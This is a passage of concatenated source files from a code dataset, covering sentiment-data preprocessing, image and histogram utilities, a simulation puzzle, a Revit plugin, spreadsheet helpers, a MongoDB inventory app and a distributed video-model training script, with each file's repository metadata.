pre_node = cur_node\n\n # update sentiment and add token_seq\n for tree_node in sent_tree:\n tokens = [sent_tree[node_idx-1]['token'] for node_idx in tree_node['leaf_node_index_seq']]\n phrase = ' '.join(tokens)\n tree_node['sentiment_label'] = sentiment_labels[dictionary[phrase]]\n tree_node['token_seq'] = tokens\n\n trees.append(sent_tree)\n\n # dataset_split (head)\n dataset_split = []\n with open(pjoin(data_dir, 'datasetSplit.txt'), encoding='utf-8') as file:\n file.readline() # for table head\n for line in file:\n dataset_split.append(int(line.strip().split(',')[1]))\n\n return trees, dictionary, sentiment_labels, dataset_split\n\n def generate_samples(self):\n samples = []\n for _type, tree in zip(self.dataset_split, self.trees):\n for tree_node in tree:\n if tree_node['parent_index'] == 0:\n sample = tree_node.copy()\n break\n sample['data_type'] = _type\n sample['sentence_token'] = sample['token_seq'].copy()\n sample.pop('node_index')\n sample.pop('parent_index')\n sample.pop('token')\n sample.pop('leaf_node_index_seq')\n sample.pop('token_seq')\n sample.pop('is_leaf')\n samples.append(sample)\n\n # sentiment label fix to class\n fixed_samples = []\n if self.label_class == 2:\n for sample in samples:\n sentiment_label = sample['sentiment_label']\n if sentiment_label> 0.4 and sentiment_label <= 0.6:\n continue\n if sentiment_label < 0.5:\n sample['sentiment_int'] = 0\n else:\n sample['sentiment_int'] = 1\n fixed_samples.append(sample)\n else:\n # 5 class\n for sample in samples:\n sentiment_label = sample['sentiment_label']\n if sentiment_label <= 0.2:\n sentiment_int = 0\n elif sentiment_label <= 0.4:\n sentiment_int = 1\n elif sentiment_label <= 0.6:\n sentiment_int = 2\n elif sentiment_label <= 0.8:\n sentiment_int = 3\n else:\n sentiment_int = 4\n sample['sentiment_int'] = sentiment_int\n fixed_samples.append(sample)\n return fixed_samples\n\n def save_preprocess_file(self):\n train_samples = []\n dev_samples = []\n test_samples = []\n for sample in self.samples:\n if sample['data_type'] == 1:\n train_samples.append(sample)\n elif sample['data_type'] == 2:\n dev_samples.append(sample)\n else:\n test_samples.append(sample)\n\n save_file(train_samples, pjoin(self.data_dir, 'train.json'), mode = 'json')\n save_file(dev_samples, pjoin(self.data_dir, 'dev.json'), mode = 'json')\n save_file(test_samples, pjoin(self.data_dir, 'test.json'), mode = 'json')\n\nsst_preprocess = SSTPreprocess(data_dir='/home/cike/zhangxing/Code/sentiment-classification-1/dataset/sst',\n label_class=2)\nsamples = sst_preprocess.samples\n# print('done')\n\n\n","repo_name":"superzhangxing/sentiment-classification-1","sub_path":"src/preprocess/sst_preprocess.py","file_name":"sst_preprocess.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17650031893","text":"import os\n\nimport cv2\nfrom tqdm import tqdm\n\npath = \"/code/data/datasets/common_hall/demo_imgs_upload\"\n\nimg_list = os.listdir(path)\n\nfor i in tqdm(img_list):\n img_path = os.path.join(path, i)\n img = cv2.imread(img_path)\n img = cv2.rectangle(img, (450, 200), (1280, 720), (0, 255, 0), thickness=4)\n cv2.imwrite(img_path, img)\n","repo_name":"sparrowml/Speed-Trap-2022","sub_path":"speed_trapv3/utilityPyScripts/draw_rect.py","file_name":"draw_rect.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2227005580","text":"import sys\nsys.stdin = open(\"낚시왕.txt\", \"r\")\n\n\ndef getData():\n r, c, m = map(int, input().split())\n arr = [list(map(int, input().split())) for _ in range(m)]\n return r, c, m, arr\n\ndef printGrid(r, c, m, arr):\n print(\"R: {}, C: {}, M: {}\".format(r, c, m))\n for i in range(m):\n print(*arr[i])\n\n\n# 딕셔너리 : 포인트 / 제일 큰 사이즈\n\ndef initialize(r, c, m, arr):\n global loc, size\n for i in range(m):\n row = arr[i][0]\n col = arr[i][1]\n speed = arr[i][2]\n dir = arr[i][3] # 1: 위, 2: 아래, 3: 오른쪽, 4: 왼쪽\n size = arr[i][4]\n\n # 사이즈 비교\n if ((col, row) not in sizes):\n sizes[(col, row)] = size\n if col not in loc:\n loc[col] = {}\n loc[col][row] = arr[i]\n else:\n sizes[(col, row)] = max(sizes[(col, row)], size)\n if size == sizes[(col, row)]:\n loc[col][row] = arr[i]\n\n\n\ndef printSharks(loc, sizes):\n for col in loc:\n for row in loc[col]:\n print(\"({}, {})\".format(row, col))\n print(loc[col][row])\n print(sizes[(col, row)])\n\n\n\ndef catchShark(loc, sizes):\n global curr, ans\n #print(sorted(loc[curr]))\n if curr in loc:\n catchCol = curr\n catchRow = sorted(loc[curr])[0]\n ans += sizes[(catchCol, catchRow)]\n sizes.pop((catchCol, catchRow))\n loc[catchCol].pop(catchRow)\n\n\ndef moveShark(loc, sizes):\n newLoc = {}\n newSizes = {}\n\n for cc in loc:\n for rr in loc[cc]:\n row = loc[cc][rr][0]\n col = loc[cc][rr][1]\n speed = loc[cc][rr][2]\n dir = loc[cc][rr][3] # 1: 위, 2: 아래, 3: 오른쪽, 4: 왼쪽\n size = loc[cc][rr][4]\n\n\n ## MOVE SEQUENCE ##\n if (dir == 1 or dir == 2):\n speed = speed % ((r - 1) * 2)\n for i in range(speed):\n if (dir == 1):\n row -= 1\n if (row < 1):\n dir = 2\n row = row + 2\n elif (dir == 2):\n row += 1\n if (row > r):\n dir = 1\n row = row - 2\n #print(dir, row, col, i, speed)\n\n\n else:\n speed = speed % ((c - 1) * 2)\n for i in range(speed):\n if (dir == 4):\n col -= 1\n if (col < 1):\n dir = 3\n col = col + 2\n elif (dir == 3):\n col += 1\n if (col > c):\n dir = 4\n col = col - 2\n\n\n\n loc[cc][rr][0] = row\n loc[cc][rr][1] = col\n loc[cc][rr][3] = dir\n\n if (col, row) in newSizes:\n newSizes[(col, row)] = max(newSizes[(col, row)], size)\n if newSizes[(col, row)] == size:\n newLoc[col][row] = loc[cc][rr]\n\n else:\n newSizes[(col, row)] = size\n if col not in newLoc:\n newLoc[col] = {}\n newLoc[col][row] = loc[cc][rr]\n\n return newLoc, newSizes\n\n\n\n\n\n\n\n\n\n\n\n\nr, c, m, arr = getData()\nloc = {}\nsizes = {}\nans = 0\n#printGrid(r, c, m, arr)\ninitialize(r, c, m, arr)\n\n\nfor curr in range(1, c + 1):\n catchShark(loc, sizes)\n loc, sizes = moveShark(loc, sizes)\n #printSharks(loc, sizes)\n #print(\"### {}\".format(ans))\n\nprint(ans)","repo_name":"howon-kim/alg","sub_path":"23상반기/코드트리/낚시왕.py","file_name":"낚시왕.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11126386375","text":"# histogram\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\n\n\nclass Hist:\n\n def __init__(self):\n self.fig, self.ax = plt.subplots()\n self.fig.set_size_inches(6, 2)\n self.ax.set_title('Histogram (grayscale)')\n self.ax.set_xlabel('Bin')\n self.ax.set_ylabel('Frequency')\n self.lw = 3\n self.alpha = 0.5\n self.bins = 16\n self.lineGray, = self.ax.plot(\n np.arange(self.bins), np.zeros((self.bins, 1)), c='k', lw=self.lw)\n self.ax.set_xlim(0, self.bins - 1)\n self.ax.set_ylim(0, 1)\n self.old = None\n plt.rcParams[\"figure.figsize\"] = (1, 1)\n plt.ion()\n plt.show()\n\n def draw(self, gray):\n # hist\n numPixels = np.prod(gray.shape[:2])\n histogram = cv2.calcHist(\n [gray], [0], None, [self.bins], [0, 255]) / numPixels\n if self.old is not None:\n self.chi2_distance(self.old, histogram)\n self.old = histogram\n self.lineGray.set_ydata(histogram)\n self.fig.canvas.draw()\n\n def chi2_distance(self, histA, histB, eps=1e-10):\n # compute the chi-squared distance\n d = 0.5 * np.sum([((a - b) ** 2) / (a + b + eps)\n for (a, b) in zip(histA, histB)])\n # return the chi-squared distance\n return d\n","repo_name":"mhtocs/quickmaths_git","sub_path":"quickmaths/utils/hist.py","file_name":"hist.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"982797365","text":"# coding: utf8\n\nfrom Autodesk.Revit.DB import Document, ViewPlan\n\nfrom pyrevit import forms, script, revit\n\n__doc__ = \"\"\"Copy view range from source views to target views.\nIf only 1 source view is selected same view range is applied to all views\"\"\"\n__title__ = \"ViewRange\"\n__author__ = \"Cyril Waechter\"\n\ndoc = revit.doc # type:Document\nlogger = script.get_logger()\n\n\ndef copy_view_range():\n \"\"\"Copy view range from source views to target views\"\"\"\n prompt_text = \"Select one or multiple source views\"\n with forms.WarningBar(title=prompt_text):\n source_list = forms.select_views(\n title=prompt_text, filterfunc=lambda x: isinstance(x, ViewPlan)\n )\n\n if not source_list:\n return False\n\n prompt_text = \"Select target views\"\n with forms.WarningBar(title=prompt_text):\n target_list = forms.select_views(\n title=prompt_text, filterfunc=lambda x: isinstance(x, ViewPlan)\n )\n\n if not target_list:\n return True\n\n with revit.Transaction(\"Copy view range\", doc):\n logger.info(\"VIEW RANGE applied from following source to target :\")\n if len(source_list) == 1:\n view_range = source_list[0].GetViewRange()\n for target in target_list: # type:ViewPlan\n target.SetViewRange(view_range)\n logger.info(\"{} -> {}\".format(source_list[0].Name, target.Name))\n else:\n for source, target in zip(\n source_list, target_list\n ): # type:ViewPlan, ViewPlan\n target.SetViewRange(source.GetViewRange())\n logger.info(\"{} -> {}\".format(source.Name, target.Name))\n return True\n\n\nwhile copy_view_range():\n pass\n","repo_name":"CyrilWaechter/pyRevitMEP","sub_path":"pyRevitMEP.tab/Manage.panel/Copy.pulldown/CopyViewRange.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"} +{"seq_id":"12143346343","text":"import re\r\n\r\nfrom . import Cell\r\n\r\n\r\ndef from_letter_base(letters):\r\n \"\"\"Tranforms a letter base number into an integer.\"\"\"\r\n n = 0\r\n for i, letter in enumerate(letters):\r\n n += (ord(letter) - 64) * pow(26, len(letters) - (i + 1))\r\n return n - 1\r\n\r\n\r\ndef find_corresponding_cell_best_effort(cells, base_cell, max_difference_with_base=0):\r\n default_cell = Cell(-1, -1, \"\")\r\n for y in base_cell.y_merge_range:\r\n for row in cells:\r\n for cell in row:\r\n if cell.x <= base_cell.x:\r\n continue\r\n if max_difference_with_base > 0 and cell.x > base_cell.x + max_difference_with_base:\r\n continue\r\n if cell.y == y and cell:\r\n return cell\r\n elif cell.y == base_cell.y and default_cell.x == -1:\r\n default_cell = cell\r\n return default_cell\r\n\r\n\r\ndef find_corresponding_cell_best_effort_from_range(spreadsheet, range_name, base_cell, max_difference_with_base=0):\r\n range_cells = spreadsheet.get_range(range_name)\r\n corresponding_cell = find_corresponding_cell_best_effort(range_cells, base_cell, max_difference_with_base)\r\n if corresponding_cell.x == -1 and range_name:\r\n worksheet, range_name = spreadsheet.get_worksheet_and_range(range_name)\r\n cells = worksheet.cells\r\n splitted_range = range_name.split(\":\")[0]\r\n column = re.split(r\"(\\d+)\", splitted_range)[0] # TODO: handle all kind of ranges\r\n column = from_letter_base(column)\r\n while len(cells) <= base_cell.y: # TODO: handle different y from base_cell\r\n cells.append([])\r\n while len(cells[base_cell.y]) <= column:\r\n cells[base_cell.y].append(Cell(len(cells[base_cell.y]), base_cell.y, \"\"))\r\n corresponding_cell = cells[base_cell.y][column]\r\n return corresponding_cell\r\n\r\n\r\ndef find_corresponding_cells_best_effort(cells, ys, base_cell, max_difference_with_base=0, filled_only=True):\r\n default_cells = []\r\n corresponding_cells = []\r\n for y in ys:\r\n for row in cells:\r\n for cell in row:\r\n if cell.x <= base_cell.x:\r\n continue\r\n if max_difference_with_base > 0 and cell.x > base_cell.x + max_difference_with_base:\r\n continue\r\n if cell.y == y:\r\n if not filled_only or cell:\r\n corresponding_cells.append(cell)\r\n if cell.y == base_cell.y:\r\n default_cells.append(cell)\r\n if not corresponding_cells:\r\n return default_cells\r\n return corresponding_cells\r\n\r\n\r\ndef find_corresponding_qualifier_cells_best_effort(\r\n spreadsheet, cells, base_cell, max_difference_with_base=0, filled_only=True\r\n):\r\n default_cells = []\r\n corresponding_cells = []\r\n last_y = -1\r\n all_x = set()\r\n first_x = -1\r\n for row in cells:\r\n for cell in row:\r\n last_y = cell.y\r\n if cell.x <= base_cell.x:\r\n continue\r\n elif first_x < 0:\r\n first_x = cell.x\r\n if max_difference_with_base > 0 and cell.x >= first_x + max_difference_with_base:\r\n continue\r\n if cell.y in base_cell.y_merge_range and (not filled_only or cell):\r\n corresponding_cells.append(cell)\r\n all_x.add(cell.x)\r\n if cell.y == base_cell.y:\r\n default_cells.append(cell)\r\n if not filled_only:\r\n y = last_y + 1\r\n all_x = sorted(all_x)\r\n worksheet = spreadsheet.get_worksheet()\r\n while y <= max(base_cell.y_merge_range):\r\n new_row = []\r\n for x in all_x:\r\n new_row.append(Cell(x, y, \"\"))\r\n worksheet.cells.append(new_row)\r\n corresponding_cells = [*corresponding_cells, *new_row]\r\n y += 1\r\n if not corresponding_cells:\r\n return default_cells\r\n return corresponding_cells\r\n\r\n\r\ndef find_corresponding_cells_best_effort_from_range(\r\n spreadsheet, range_name, base_cell, max_difference_with_base=0, filled_only=True\r\n):\r\n range_cells = spreadsheet.get_range(range_name)\r\n corresponding_cells = find_corresponding_cells_best_effort(\r\n range_cells, base_cell.y_merge_range, base_cell, max_difference_with_base, filled_only\r\n )\r\n if not filled_only and not corresponding_cells and range_name:\r\n worksheet, range_name = spreadsheet.get_worksheet_and_range(range_name)\r\n cells = worksheet.cells\r\n splitted_range = range_name.split(\":\")[0]\r\n column, _, _ = re.split(r\"(\\d+)\", splitted_range) # TODO: handle all kind of ranges\r\n column = from_letter_base(column)\r\n max_y = base_cell.y_merge_range[-1]\r\n while len(cells) <= max_y: # TODO: handle different y from base_cell\r\n cells.append([])\r\n while len(cells[max_y]) <= column:\r\n cells[max_y].append(Cell(len(cells[max_y]), max_y, \"\"))\r\n return find_corresponding_cells_best_effort(\r\n spreadsheet.get_range(range_name),\r\n base_cell.y_merge_range,\r\n base_cell,\r\n max_difference_with_base,\r\n filled_only,\r\n )\r\n return corresponding_cells\r\n\r\n\r\ndef check_range(cell_range):\r\n \"\"\"Checks if the range is valid.\"\"\"\r\n range_regex = r\"([A-Z]+\\d*|\\d+)(:([A-Z]+\\d*|\\d+))?\"\r\n if not re.match(r\"^\" + range_regex + r\"((,| |, |;|; |\\|)\" + range_regex + r\")*$\", cell_range):\r\n return False\r\n return True\r\n\r\n\r\ndef extract_spreadsheet_id(string):\r\n \"\"\"Extracts the sprreadsheet id from an url.\"\"\"\r\n if \"/edit\" in string:\r\n string = string.split(\"/edit\")[0]\r\n if \"/\" in string:\r\n string = string.rstrip(\"/\")\r\n string = string.split(\"/\")[-1]\r\n string = string.split(\"&\")[0]\r\n string = string.split(\"#\")[0]\r\n return string\r\n","repo_name":"SpartanPlume/Tosurnament","sub_path":"backend/common/api/spreadsheet/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"20464896231","text":"import pymongo\nimport toml\n\nDEFAULT_STATUSES = [\"Нет\", \"Списано\", \"Утилизировано\"]\nDEFAULT_HARDWARE_TYPES = [\n \"ПК\",\n \"Принтер\",\n \"Камера видеонаблюдения\",\n \"Монитор\",\n \"Аудиосистема\",\n \"Монитор\",\n \"Проектор\",\n \"Маршрутизатор\"\n]\n\ntable_fields = {\n 'inv_num': {'type': 'input', 'show': 'Инвертарный номер'},\n 'type': {'type': 'dropdown', 'show': 'Тип', 'elements': \"metadata.hardware_types\"},\n 'vendor': {'type': 'input', 'show': 'Производитель'},\n 'model': {'type': 'input', 'show': 'Модель'},\n 'serial': {'type': 'input', 'show': 'Серийный номер'},\n 'status': {'type': 'dropdown', 'show': 'Статус', 'elements': \"metadata.statuses\"},\n 'employee': {'type': 'dropdown', 'show': 'Отвественный', 'elements': \"employees\"},\n 'description': {'type': 'textbox', 'show': 'Описание'},\n}\n\nemployees_table_fields = {\n 'surname': {'type': 'input', 'show': 'Фамилия'},\n 'name': {'type': 'input', 'show': 'Имя'},\n 'patronymic': {'type': 'input', 'show': 'Отчество'},\n 'hpart_name': {'type': 'dropdown', 'show': 'Отдел', 'elements': \"hparts.name\"}\n}\n\nhparts_table_fields = {\n 'id': {'type': 'input', 'show': 'ID'},\n 'name': {'type': 'input', 'show': 'Название'},\n}\n\nmetadata = {\n 'statuses': DEFAULT_STATUSES,\n 'hardware_types': DEFAULT_HARDWARE_TYPES\n}\n\nclass Hardware:\n def __init__(self, inv_num, type_, vendor, model, serial, description, employee, status = \"Нет\"):\n self.inv_num = inv_num\n self.type = type_\n self.vendor = vendor\n self.model = model\n self.serial = serial\n self.status = status\n self.employee = employee\n self.description = description\n\nclass HPart:\n def __init__(self, id, name):\n self.id = id\n self.name = name\n\nclass Employee:\n def __init__(self, id, surname, name, patronymic, hpart_id):\n self.id = id\n self.surname = surname\n self.name = name\n self.patronymic = patronymic\n self.hpart_id = hpart_id\n\nclass Database:\n def __init__(self) -> None:\n try:\n self.config = toml.load(\"../config.toml\")['server']\n except:\n self.config = toml.load(\"config.toml\")['server']\n\n\n self.addr = self.config['address']\n\n self.connection = pymongo.MongoClient(self.addr)\n\n self.db = self.connection.hardware\n\n self.hardware_table = self.db.hwtable # Устройства\n self.table_fields = self.db.table_fields # Описание полей таблиц\n self.metadata = self.db.metadata # Дополнительные данные\n\n self.employees = self.db.employees # Сотрудники\n self.employees_table_fields = self.db.employees_table_fields # Сотрудники\n \n self.hparts = self.db.hparts # Отделы\n self.hparts_table_fields = self.db.hparts_table_fields # Сотрудники\n\n # Настройка\n def setup(self):\n self.table_fields.insert_one(table_fields)\n self.employees_table_fields.insert_one(employees_table_fields)\n self.hparts_table_fields.insert_one(hparts_table_fields)\n self.metadata.insert_one(metadata)\n\n # Очистка всей БД\n def clean_db(self):\n \"Remove every collection data to make a clean DB\"\n self.table_fields.delete_many({})\n self.employees_table_fields.delete_many({})\n self.hparts_table_fields.delete_many({})\n\n self.hardware_table.delete_many({})\n self.metadata.delete_many({})\n \n self.employees.delete_many({})\n self.hparts.delete_many({})\n\n def is_inv_num_free(self, num: int):\n return not (num in [i['inv_num'] for i in self.get_all()])\n\n def get_hpart_id_by_name(self, name: str):\n for i in self.hparts.find({}):\n if i[\"name\"] == name:\n return i[\"id\"]\n\n def evaluate_fields(self, fields_name):\n \"Evaluate links in values\"\n\n if not list(self.db[fields_name].find({})):\n return {}\n\n # Get data from `fields_name`\n data: dict = list(self.db[fields_name].find({}))[0]\n\n # Go through data and if we get string in `elements` key, get following field (by string) from db.\n for k, v in data.items():\n if type(v) is dict and v['type'] == \"dropdown\":\n # FIXME\n if k == \"hpart_name\":\n data[k]['elements'] = [i['name'] for i in self.hparts.find({})]\n continue\n elif k == \"employee\":\n data[k][\"elements\"] = [f\"{i['surname']} {i['name']} {i['patronymic']}\" for i in self.employees.find({})]\n continue\n\n keys = v['elements'].split(\".\")\n\n temp = list(self.db[keys[0]].find({}))[0]\n del keys[0]\n\n for i in keys:\n temp = temp[i]\n \n data[k]['elements'] = temp\n \n del data['_id']\n\n return data\n\n def add_hardware(self, hardware: Hardware):\n # INV NUMS should not repeat!\n\n invs = [i['inv_num'] for i in self.get_all()]\n\n if hardware.inv_num in invs:\n raise ValueError(f\"Inventory number should not repeat! (Hint: Delete device and add device again) [{hardware.inv_num}]\")\n\n self.hardware_table.insert_one(hardware.__dict__)\n\n def add_hpart(self, hpart: HPart):\n self.hparts.insert_one(hpart.__dict__)\n\n def add_employee(self, employee: Employee):\n if employee.id in [i['id'] for i in self.employees.find()]:\n raise ValueError(f\"Employee ID should not repeat! ({employee.id})\")\n \n self.employees.insert_one(employee.__dict__)\n\n def get_all(self):\n return self.hardware_table.find()\n\n def get_from_length(self, start, length):\n return self.hardware_table.find().skip(start).limit(length)\n\n # def get_by_vendor(self, vendor: str):\n # return [i for i in self.hardware_table.find() if i['vendor'].lower() == vendor.lower()]\n \n # def get_by_name(self, name: str):\n # return [i for i in self.hardware_table.find() if i['name'].lower() == name.lower()]\n \n # def get_by_model(self, model: str):\n # return [i for i in self.hardware_table.find() if i['model'].lower() == model.lower()]\n \n # def get_by_serial(self, serial: str):\n # return [i for i in self.hardware_table.find() if i['serial'].lower() == serial.lower()]\n \n # def get_by_status(self, status: int):\n # return [i for i in self.hardware_table.find() if i['status'] == status]\n\n # def get_by_inv_num(self, inv_num: int):\n # return [i for i in self.hardware_table.find() if i['inv_num'] == inv_num]\n\n # def get_by_type(self, type_: str):\n # return [i for i in self.hardware_table.find() if i['type'].lower() == type_.lower()]\n\n\nif __name__ == \"__main__\":\n db = Database()\n\n db.clean_db()\n db.setup()\n\n # for n, i in enumerate((\"ABC\", \"DEF\", \"GHI\")):\n # db.add_hpart(HPart(n, i))\n\n # for n, i in enumerate((\"Clark\", \"Max\", \"Drew\", \"Eric\", \"Mark\", \"David\")):\n # db.add_employee(Employee(n, \"Markin\", i, \"Eduardovich\", 0))\n\n # db.add_employee(Employee(99, \"Thunder\", \"Zeraora\", \"-----------\", 1))\n\n # for i in range(15):\n # hw_ = Hardware(800 + i, \"Аудиосистема\", \"ByteSaver\", \"LAVI-W\", \"UT0\" + str(i), \"2 TB Hard Drive 100 MB/s\", \"Thunder Zeraora ------------\")\n\n # db.add_hardware(hw_)\n","repo_name":"NDRAEY/HardwareDatabase","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":7716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36073833828","text":"import warnings\n\nwarnings.filterwarnings(\"ignore\")\n\nimport os\nfrom os.path import expanduser\nimport sys\nimport time\nimport multiprocessing\n\nimport torch.nn.parallel\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nfrom torch.nn.utils import clip_grad_norm_\nimport torch.nn.functional as f\nfrom ops.dataset import TSNDataSet\nfrom ops.models_gate import TSN_Gate\nfrom ops.models_ada import TSN_Ada\nfrom ops.transforms import *\nfrom ops import dataset_config\nfrom ops.utils import AverageMeter, accuracy, cal_map, Recorder, verb_noun_accuracy, get_marginal_output\nfrom opts import parser\n\nfrom tensorboardX import SummaryWriter\nfrom ops.my_logger import Logger\n\nfrom tools.net_flops_table import get_gflops_params, feat_dim_dict\n\n#distributed\nimport platform\nimport torch.multiprocessing as mp\nimport torch.distributed as dist\n\n# TODO(yue)\nimport numpy as np\nimport common\nfrom os.path import join as ospj\nfrom shutil import copyfile\nimport shutil\nimport pickle\n\ndef main():\n args = parser.parse_args()\n common.set_manual_data_path(args.data_path, args.exps_path)\n\n #TODO(distributed)\n if args.hostfile != '':\n curr_node_name = platform.node().split(\".\")[0]\n with open(args.hostfile) as f:\n nodes = [x.strip() for x in f.readlines() if x.strip() != '']\n master_node = nodes[0].split(\" \")[0]\n for idx, node in enumerate(nodes):\n if curr_node_name in node:\n args.rank = idx\n break\n args.world_size = len(nodes)\n args.dist_url = \"tcp://{}:10598\".format(master_node)\n args.distributed = args.world_size > 1 or args.multiprocessing_distributed\n ngpus_per_node = torch.cuda.device_count() #len(args.gpus)\n\n test_mode = (args.test_from != \"\")\n if args.multiprocessing_distributed:\n args.world_size = ngpus_per_node * args.world_size\n mp.spawn(main_worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args, test_mode))\n else:\n main_worker(args.gpus, ngpus_per_node, args, test_mode)\n\n\ndef main_worker(gpu_i, ngpus_per_node, args, test_mode):\n args.gpus = gpu_i\n if args.multiprocessing_distributed or args.distributed:\n node_seed_offset = 10086 * args.rank\n else:\n node_seed_offset = 0\n if args.train_random_seed<0:\n args.train_random_seed = args.random_seed\n set_random_seed(node_seed_offset + args.random_seed, args)\n\n args.num_class, args.train_list, args.val_list, args.root_path, prefix = \\\n dataset_config.return_dataset(args.dataset,\n args.data_path) # TODO this is only used if manually set\n\n # TODO(distributed)\n if args.gpus is not None:\n print(\"Use GPU: {} for training\".format(args.gpus))\n if args.distributed:\n if args.dist_url == \"env://\" and args.rank == -1:\n args.rank = int(os.environ[\"RANK\"])\n if args.multiprocessing_distributed:\n # For multiprocessing distributed training, rank needs to be the uniform rank among all the processes\n args.rank = args.rank * ngpus_per_node + args.gpus\n dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url,\n world_size=args.world_size, rank=args.rank)\n\n if args.rank == 0:\n logger = Logger()\n sys.stdout = logger\n\n if args.ada_reso_skip:\n model = TSN_Gate(args=args)\n else:\n model = TSN_Ada(args=args)\n base_model_gflops, gflops_list, g_meta = init_gflops_table(model, args)\n\n if args.no_optim:\n policies = [{'params': model.parameters(), 'lr_mult': 1, 'decay_mult': 1, 'name': \"parameters\"}]\n else:\n policies = model.get_optim_policies()\n\n optimizer = torch.optim.SGD(policies, args.lr, momentum=args.momentum, weight_decay=args.weight_decay)\n\n # TODO(distributed)\n if args.distributed:\n # For multiprocessing distributed, DistributedDataParallel constructor\n # should always set the single device scope, otherwise,\n # DistributedDataParallel will use all available devices.\n if args.gpus is not None and not isinstance(args.gpus, list):\n torch.cuda.set_device(args.gpus)\n model.cuda(args.gpus)\n # When using a single GPU per process and per\n # DistributedDataParallel, we need to divide the batch size\n # ourselves based on the total number of GPUs we have\n # the batch size should be divided by number of nodes as well\n args.batch_size = int(args.batch_size / args.world_size)\n args.workers = int(args.workers / ngpus_per_node)\n\n if args.sync_bn:\n process_group = torch.distributed.new_group(list(range(args.world_size)))\n model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model, process_group)\n\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpus], find_unused_parameters=True)\n else:\n model.cuda()\n # DistributedDataParallel will divide and allocate batch_size to all\n # available GPUs if device_ids are not set\n model = torch.nn.parallel.DistributedDataParallel(model, find_unused_parameters=True)\n # elif args.gpus is not None:\n # torch.cuda.set_device(args.gpus)\n # model = model.cuda(args.gpus)\n else:\n # DataParallel will divide and allocate batch_size to all available GPUs\n # assign rank to 0\n model = torch.nn.DataParallel(model, device_ids=args.gpus).cuda()\n args.rank = 0\n\n handle_frozen_things_in(model, args)\n\n if args.resume:\n if os.path.isfile(args.resume):\n # TODO s\n if args.rank==0:\n print((\"=> loading checkpoint '{}'\".format(args.resume)))\n checkpoint = torch.load(args.resume)\n args.start_epoch = checkpoint['epoch']\n # best_prec1 = checkpoint['best_prec1']\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n if args.rank == 0:\n print((\"=> loaded checkpoint '{}' (epoch {})\".format(args.resume, checkpoint['epoch'])))\n else:\n if args.rank == 0:\n print((\"=> no checkpoint found at '{}'\".format(args.resume)))\n\n # TODO(yue) loading pretrained weights\n elif test_mode or args.base_pretrained_from != \"\" or args.use_tsmk8 or args.use_segk8 or args.use_tsmk16:\n if args.use_segk8:\n the_model_path = expanduser(\n \"~/.cache/torch/checkpoints/TSM_kinetics_RGB_resnet50_avg_segment5_e50.pth\")\n elif args.use_tsmk8:\n the_model_path = expanduser(\n \"~/.cache/torch/checkpoints/TSM_kinetics_RGB_resnet50_shift8_blockres_avg_segment8_e50.pth\")\n elif args.use_tsmk16:\n the_model_path = expanduser(\n \"~/.cache/torch/checkpoints/TSM_kinetics_RGB_resnet50_shift8_blockres_avg_segment16_e50.pth\")\n else:\n the_model_path = args.base_pretrained_from\n if test_mode:\n the_model_path = ospj(args.test_from, \"models\", \"ckpt.best.pth.tar\")\n the_model_path = common.EXPS_PATH + \"/\" + the_model_path\n\n sd = torch.load(the_model_path)['state_dict']\n sd = take_care_of_pretraining(sd, args)\n\n model_dict = model.state_dict()\n model_dict.update(sd)\n model.load_state_dict(model_dict)\n\n cudnn.benchmark = True\n\n train_loader, val_loader = get_data_loaders(model, prefix, args)\n # define loss function (criterion) and optimizer\n # if args.gpus is not None: #args.distributed\n # criterion = torch.nn.CrossEntropyLoss().cuda(args.gpus)\n # else:\n criterion = torch.nn.CrossEntropyLoss().cuda()\n\n if args.rank==0:\n exp_full_path = setup_log_directory(args.exp_header, test_mode, args, logger)\n # TODO stat runtime info\n import socket\n import getpass\n print(\"%s@%s started the experiment at %s\"%(getpass.getuser(), socket.gethostname(), logger._timestr))\n\n if not test_mode:\n with open(os.path.join(exp_full_path, 'args.txt'), 'w') as f:\n f.write(str(args))\n tf_writer = SummaryWriter(log_dir=exp_full_path)\n else:\n tf_writer = None\n\n # TODO(yue)\n if args.rank == 0:\n map_record, mmap_record, prec_record, prec5_record = get_recorders(4)\n if args.dataset == \"epic\":\n verb_prec1_record, verb_prec5_record, noun_prec1_record, noun_prec5_record = get_recorders(4)\n best_train_usage_str = None\n best_val_usage_str = None\n\n for epoch in range(args.start_epoch, args.epochs):\n # train for one epoch\n if not args.skip_training:\n set_random_seed(node_seed_offset + args.train_random_seed + epoch, args)\n adjust_learning_rate(optimizer, epoch, -1, -1, args.lr_type, args.lr_steps, args)\n train_usage_str = train(train_loader, model, criterion, optimizer, epoch, base_model_gflops, gflops_list, g_meta, args, tf_writer)\n\n torch.cuda.empty_cache()\n if args.distributed:\n dist.barrier()\n\n # evaluation\n if (epoch + 1) % args.eval_freq == 0 or epoch == args.epochs - 1:\n set_random_seed(args.random_seed, args)\n mAP, mmAP, prec1, prec5, val_usage_str, epic_precs = \\\n validate(val_loader, model, criterion, epoch, base_model_gflops, gflops_list, g_meta, exp_full_path, args, tf_writer)\n\n if args.distributed:\n dist.barrier()\n\n # remember best prec@1 and save checkpoint\n if args.rank == 0:\n 